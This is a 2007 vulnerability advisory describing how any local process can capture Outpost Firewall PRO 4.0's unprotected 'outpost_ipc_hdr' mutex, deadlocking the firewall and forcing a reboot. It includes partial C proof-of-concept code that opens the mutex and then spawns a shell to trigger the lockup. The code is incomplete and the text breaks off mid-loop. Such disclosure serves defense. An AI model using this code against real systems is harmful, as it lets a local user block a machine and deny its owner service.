Outpost Enforcing System Reboot with 'outpost_ipc_hdr' Mutex Vulnerability
3 Jun. 2007
Summary
A vulnerability in the way Outpost Firewall handles an internal mutex called outpost_ipc_hdr allows local attacker to capture this mutex which in turn will cause the Outpost program to misbehave, which in turn forces the user to reboot the system.
Vulnerable software:
* Outpost Firewall PRO 4.0 (1007.591.145)
* Outpost Firewall PRO 4.0 (964.582.059)
Outpost insufficiently protects its own mutex outpost_ipc_hdr. Arbitrary process is able to open and capture this mutex. In such case, Outpost is not able to use this mutex for its synchronization and its internal mechanisms lock when they try to use it. Outpost uses this mutex every time a potentially dangerous operation is executed. For example, this results in an impossibility of running new processes while the mutex is locked. After the mutex is released, all blocked operations completes. However, the release can not be enforced. User is thus forced to reboot the system.
Exploit:
/*
Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
void about(void)
{
printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
while (1)
{
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
